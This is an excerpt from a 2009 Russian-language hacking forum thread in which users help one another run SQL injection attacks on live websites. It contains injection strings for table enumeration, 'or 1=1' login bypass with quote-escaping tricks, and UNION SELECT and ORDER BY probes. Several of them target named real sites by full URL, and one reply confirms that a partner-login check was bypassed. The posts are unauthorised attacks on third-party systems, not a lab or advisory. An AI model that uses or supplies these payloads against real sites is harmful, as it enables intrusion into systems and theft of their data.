23.02.2009, 13:25
|
|
Новичок
Регистрация: 26.12.2008
Сообщений: 16
С нами:
9144303
Репутация:
16
|
|
У меня при запросе, напр
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
вылазит ошибка
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
/html/leftbar-categories.asp, line 12
замена "+" на пробел или /**/ не помогла |
|
|
23.02.2009, 13:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Сообщение от Shadow6120
У меня при запросе, напр
вылазит ошибка
замена "+" на пробел или /**/ не помогла
Линк в студию.
|
|
|
|
23.02.2009, 13:51
|
|
Новичок
Регистрация: 26.12.2008
Сообщений: 16
С нами:
9144303
Репутация:
16
|
|
Сообщение от R1dex
Линк в студию.
Не хачу  т.к. сайт оч крутойи если скажу скорее всего прикроют
Последний раз редактировалось Shadow6120; 23.02.2009 в 13:55..
|
|
|
|
23.02.2009, 15:19
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
it's mу не знаю какому чудо программеру потребовалось написать такой код, но пусть это останится на его совести:
(pwd = '$pass' or pwd = '$pass' or pwd = '$pass')
Опять-же функцию ты написал от фонаря, и единственное, что извесно точно, это этот чудесный запрос, и то, что ковычка заменяется на "\"(это по ошибкам мускула)
При таком раскладе ты ничего не сделаешь т.к. ковычку необходимую для закрытия ты не получишь.
НО ! Т.к функция замены символов тобою выдумана, и достоверно мы не знаем, что там за код, могут быть варианты.
Ну и конечно, если всё-же в чудо запросе участвует ещё одна переменная, и тогда тоже есть варианты например так:
(user_password='$pass' or user_name='$name')
pass='&name=)+or+1=1/*
И тогда проходим авторизацию
(user_password='\' or user_name=')+or+1=1/*')
Но это ,я думаю, ты и сам понимаешь
И кстати, насчёт # AkyHa_MaTaTa прав, тогда уж %23
=====================
Сообщение от m0use
нук у кого получится раскрутить что то у меня не получается
Нук, почитай статьи , и на запрос внимательно посмотри, он весь в ошибке.
http://www.etoya.ru/search/?text=-11')+group+by+1+union+select+1,2,3,4,version(),6,7 ,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27/*
|
|
|
|
23.02.2009, 13:29
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
С нами:
9075206
Репутация:
171
|
|
я думаю привел достаточно информации, так что думаю можно обойтись без линка  |
|
|
|
23.02.2009, 14:43
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами:
10639074
Репутация:
16
|
|
http://www.etoya.ru/search/?text=lol')+group+by+26/*
нук у кого получится раскрутить что то у меня не получается
|
|
|
|
23.02.2009, 15:31
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
С нами:
9075206
Репутация:
171
|
|
jokester там нет второй переменной, исходя из твоего поста и моих соображений, то навряд-ли что-то можно сделать в данной ситуации на счет функции ReRe её я сделал что бы показать какие символы на что меняются, т.е. логически исходя из моего поста, в твой запрос pass='&name=)+or+1=1/* неверен, ни по символам, ни по ситуации, так как переменная одна. Для просящих все таки выложу ссылочку, может быть кто-то умнее меня miniubka.cc/pay1.php?partner=2&video=index.php
|
|
|
|
23.02.2009, 16:00
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
l1ght Бинго, вы перешли на второй уровень 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') or 1=1#\'' at line 1
SELECT * FROM partner_access where partner='2' and pwd=') or 1=1#\'
|
|
|
|
24.02.2009, 00:10
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Есть сайт на асп(судя по всему MSSQL  ), ощибки базы данных не выводятся... но есть слепая инъекция, как я думаю.
script.asp?id=853 - контент показывается
script.asp?id=853' - контент не показывается
script.asp?id=853+order+by+8-- - подобрал колонки, их восемь.
script.asp?id=853+union+select+null,null,null,null ,null,null,null,null-- ничего не выводиться, в том числе контент.
Как быть с этим? Подбирать тип колонок вручную? или что то еще можно?
И вообще, правильно ли я рассуждал? |
|
|
|
24.02.2009, 06:31
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
непонятная скуля.. да еще и сайт не быстр принайме у меня..
http://www.whimit.com/forum_read.php?f=17э&id=75739'
а как у вас? ) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
